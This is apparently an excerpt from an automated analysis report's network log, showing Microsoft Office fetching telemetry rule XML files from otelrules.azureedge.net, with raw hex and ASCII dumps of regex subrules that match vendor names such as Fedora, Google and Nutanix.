                                                  2024-10-31 19:50:42 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  57192.168.2.45236913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:43 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:43 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:43 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B989EE75B"
                                                  x-ms-request-id: a606ba7c-601e-003d-0781-2a6f25000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195043Z-159b85dff8f7svrvhC1DFWth2s00000001wg00000000gsss
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:43 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  58192.168.2.45237013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:43 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:43 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:43 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: 4a7bd2a8-301e-0096-209e-26e71d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195043Z-16849878b78qf2gleqhwczd21s0000000a20000000010g0g
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:43 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  59192.168.2.45237113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:43 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:43 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97E6FCDD"
                                                  x-ms-request-id: d0d63b60-601e-0050-7d63-272c9c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195043Z-17c5cb586f62bgw58esgbu9hgw00000002p000000000dgfa
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:43 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  60192.168.2.45237213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:43 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:43 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C710B28"
                                                  x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195043Z-16849878b78p8hrf1se7fucxk80000000aw000000000ct5k
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:43 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  61192.168.2.45237313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:43 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:43 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                  ETag: "0x8DC582BA54DCC28"
                                                  x-ms-request-id: 45dd879e-001e-0065-29fe-2a0b73000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195043Z-15b8d89586fmhkw429ba5n22m80000000bgg00000000a25m
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:43 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  62192.168.2.45237513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:44 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:44 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:44 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7F164C3"
                                                  x-ms-request-id: 57989b77-d01e-0049-621c-27e7dc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195044Z-16849878b78p49s6zkwt11bbkn00000009gg0000000130mu
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  63192.168.2.45237613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:44 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:44 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:44 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                  ETag: "0x8DC582BA48B5BDD"
                                                  x-ms-request-id: 12c3b8a8-601e-0084-2933-2a6b3f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195044Z-159b85dff8f6x4jjhC1DFW7uqg00000001k000000000muwn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:44 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  64192.168.2.45237913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:44 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:44 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:44 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3EAF226"
                                                  x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195044Z-16849878b78bjkl8dpep89pbgg00000008pg00000000hnc3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:44 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  65192.168.2.45237713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:44 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:44 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:44 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                  ETag: "0x8DC582B9FF95F80"
                                                  x-ms-request-id: 3c5c3d60-c01e-0066-4c9e-26a1ec000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195044Z-16849878b78zqkvcwgr6h55x9n00000009eg00000000d921
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  66192.168.2.45237813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:44 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:44 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:44 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                  ETag: "0x8DC582BB650C2EC"
                                                  x-ms-request-id: 080d32a9-801e-0035-752d-2b752a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195044Z-15b8d89586fwzdd88qtcg4dr18000000028g0000000030a6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:44 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  67192.168.2.45238313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:45 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:45 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                  ETag: "0x8DC582BB556A907"
                                                  x-ms-request-id: d24b0423-701e-0098-2b81-2a395f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195045Z-159b85dff8fdjprfhC1DFWuqh000000000y0000000002rx9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
